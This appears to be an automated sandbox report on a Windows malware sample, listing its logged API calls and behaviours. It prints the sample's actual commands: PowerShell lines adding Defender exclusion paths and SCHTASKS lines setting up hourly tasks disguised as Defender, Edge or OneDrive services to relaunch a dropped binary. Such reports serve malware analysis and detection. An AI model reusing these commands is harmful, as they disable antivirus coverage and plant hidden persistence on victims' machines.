CreateProcessInternalW Aug. 13, 2022, 8:36 p.m.	thread_identifier: 3992 thread_handle: 0x00000364 process_identifier: 3988 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "cmd.exe" /C chcp 1251 & powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SystemData" filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000370	1	1
CreateProcessInternalW Aug. 13, 2022, 8:36 p.m.	thread_identifier: 2496 thread_handle: 0x00001540 process_identifier: 1172 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "C:\ProgramData\Dllhost\dllhost.exe" filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00001394	1	1
CreateProcessInternalW Aug. 13, 2022, 8:36 p.m.	thread_identifier: 3604 thread_handle: 0x00000254 process_identifier: 3600 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000278	1	1
CreateProcessInternalW Aug. 13, 2022, 8:36 p.m.	thread_identifier: 3576 thread_handle: 0x00000278 process_identifier: 2632 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000254	1	1
CreateProcessInternalW Aug. 13, 2022, 8:36 p.m.	thread_identifier: 3660 thread_handle: 0x00000254 process_identifier: 3316 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000278	1	1
CreateProcessInternalW Aug. 13, 2022, 8:36 p.m.	thread_identifier: 3632 thread_handle: 0x00000278 process_identifier: 3620 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000254	1	1
CreateProcessInternalW Aug. 13, 2022, 8:36 p.m.	thread_identifier: 3188 thread_handle: 0x00000254 process_identifier: 3332 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000278	1	1
CreateProcessInternalW Aug. 13, 2022, 8:36 p.m.	thread_identifier: 416 thread_handle: 0x00000278 process_identifier: 244 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000254	1	1
CreateProcessInternalW Aug. 13, 2022, 8:36 p.m.	thread_identifier: 3836 thread_handle: 0x00000254 process_identifier: 3856 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000278	1	1
CreateProcessInternalW Aug. 13, 2022, 8:36 p.m.	thread_identifier: 3976 thread_handle: 0x00000278 process_identifier: 3792 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000254	1	1
CreateProcessInternalW Aug. 13, 2022, 8:36 p.m.	thread_identifier: 1876 thread_handle: 0x00000254 process_identifier: 1512 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk1481" /TR "C:\ProgramData\Dllhost\dllhost.exe" filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000278	1	1
CreateProcessInternalW Aug. 13, 2022, 8:36 p.m.	thread_identifier: 3232 thread_handle: 0x00000278 process_identifier: 2312 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk579" /TR "C:\ProgramData\Dllhost\dllhost.exe" filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000254	1	1
CreateProcessInternalW Aug. 13, 2022, 8:36 p.m.	thread_identifier: 4040 thread_handle: 0x00000254 process_identifier: 3992 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk406" /TR "C:\ProgramData\Dllhost\dllhost.exe" filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000278	1	1
CreateProcessInternalW Aug. 13, 2022, 8:36 p.m.	thread_identifier: 3524 thread_handle: 0x00000278 process_identifier: 3544 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk7066" /TR "C:\ProgramData\Dllhost\dllhost.exe" filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000254	1	1
CreateProcessInternalW Aug. 13, 2022, 8:36 p.m.	thread_identifier: 3468 thread_handle: 0x000002f8 process_identifier: 3344 current_directory: C:\ProgramData\SystemFiles\ filepath: track: 1 command_line: "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000002cc	1	1
CreateProcessInternalW Aug. 13, 2022, 8:37 p.m.	thread_identifier: 1656 thread_handle: 0x00000510 process_identifier: 2064 current_directory: C:\ProgramData\SystemFiles\ filepath: track: 1 command_line: "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000514	1	1

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (8 events)

Time & API	Arguments	Status	Return
Process32NextW Aug. 13, 2022, 8:14 p.m.	snapshot_handle: 0x00000298 process_name: pw.exe process_identifier: 2076	1	1
Process32NextW Aug. 13, 2022, 8:14 p.m.	snapshot_handle: 0x00000298 process_name: taskhost.exe process_identifier: 2200	1	1
Process32NextW Aug. 13, 2022, 8:14 p.m.	snapshot_handle: 0x00000298 process_name: iexplore.exe process_identifier: 2764	1	1
Process32NextW Aug. 13, 2022, 8:14 p.m.	snapshot_handle: 0x00000298 process_name: real.exe process_identifier: 2408	1	1
Process32NextW Aug. 13, 2022, 8:14 p.m.	snapshot_handle: 0x00000298 process_name: tag.exe process_identifier: 2652	1	1
Process32NextW Aug. 13, 2022, 8:14 p.m.	snapshot_handle: 0x00000298 process_name: WW1.exe process_identifier: 3096	1	1
Process32NextW Aug. 13, 2022, 8:14 p.m.	snapshot_handle: 0x00000298 process_name: WmiPrvSE.exe process_identifier: 3408	1	1
Process32NextW Aug. 13, 2022, 8:14 p.m.	snapshot_handle: 0x00000298 process_name: process_identifier: 2244396		0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Aug. 13, 2022, 8:13 p.m.	process_identifier: 2552 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 8192 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x03a10000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Aug. 13, 2022, 8:14 p.m.	flags: 15 family: 0		111	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (17 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Aug. 13, 2022, 8:14 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Aug. 13, 2022, 8:14 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Aug. 13, 2022, 8:14 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Aug. 13, 2022, 8:14 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Aug. 13, 2022, 8:06 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Aug. 13, 2022, 8:06 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Aug. 13, 2022, 8:06 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Aug. 13, 2022, 8:06 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Aug. 13, 2022, 8:06 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Aug. 13, 2022, 8:06 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Aug. 13, 2022, 8:06 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Aug. 13, 2022, 8:06 p.m.	system_name: privilege_name: SeShutdownPrivilege	1	1
LookupPrivilegeValueW Aug. 13, 2022, 8:36 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Aug. 13, 2022, 8:36 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Aug. 13, 2022, 8:36 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Aug. 13, 2022, 8:36 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Aug. 13, 2022, 8:36 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Yara rule detected in process memory (24 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Queries for potentially installed applications (50 out of 260 events)

Time & API	Arguments	Status
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x000003c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: 7-Zip base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: AddressBook base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: Adobe AIR base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: Connection Manager base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: DirectDrawEx base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: EditPlus base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: Fontcore base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: Google Chrome base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: Haansoft HWord 80 Korean base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: IE40 base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: IE4Data base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: IE5BAKEX base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: IEData base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: MobileOptionPack base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: Mozilla Thunderbird 78.4.0 (x86 ko) base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: NewProduct 1.00 base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\NewProduct 1.00	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: Office15.PROPLUSR base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: SchedulingAgent base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: WIC base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: {00203668-8170-44A0-BE44-B632FA4D780F} base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: {26A24AE4-039D-4CA4-87B4-2F32180131F0} base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: {4A03706F-666A-4037-7777-5F2748764D10} base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: {90150000-0015-0409-0000-0000000FF1CE} base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: {90150000-0016-0409-0000-0000000FF1CE} base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: {90150000-0018-0409-0000-0000000FF1CE} base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: {90150000-0019-0409-0000-0000000FF1CE} base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: {90150000-001A-0409-0000-0000000FF1CE} base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: {90150000-001B-0409-0000-0000000FF1CE} base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: {90150000-001F-0409-0000-0000000FF1CE} base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: {90150000-001F-040C-0000-0000000FF1CE} base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: {90150000-001F-0C0A-0000-0000000FF1CE} base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: {90150000-002C-0409-0000-0000000FF1CE} base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: {90150000-0044-0409-0000-0000000FF1CE} base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: {90150000-006E-0409-0000-0000000FF1CE} base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: {90150000-0090-0409-0000-0000000FF1CE} base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: {90150000-00A1-0409-0000-0000000FF1CE} base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: {90150000-00BA-0409-0000-0000000FF1CE} base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: {90150000-00E1-0409-0000-0000000FF1CE} base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: {90150000-00E2-0409-0000-0000000FF1CE} base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: {90150000-0115-0409-0000-0000000FF1CE} base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: {90150000-0117-0409-0000-0000000FF1CE} base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: {90150000-012B-0409-0000-0000000FF1CE} base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: {91150000-0011-0000-0000-0000000FF1CE} base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1
RegOpenKeyExW Aug. 13, 2022, 8:14 p.m.	regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x000003c8 key_handle: 0x000003cc options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1
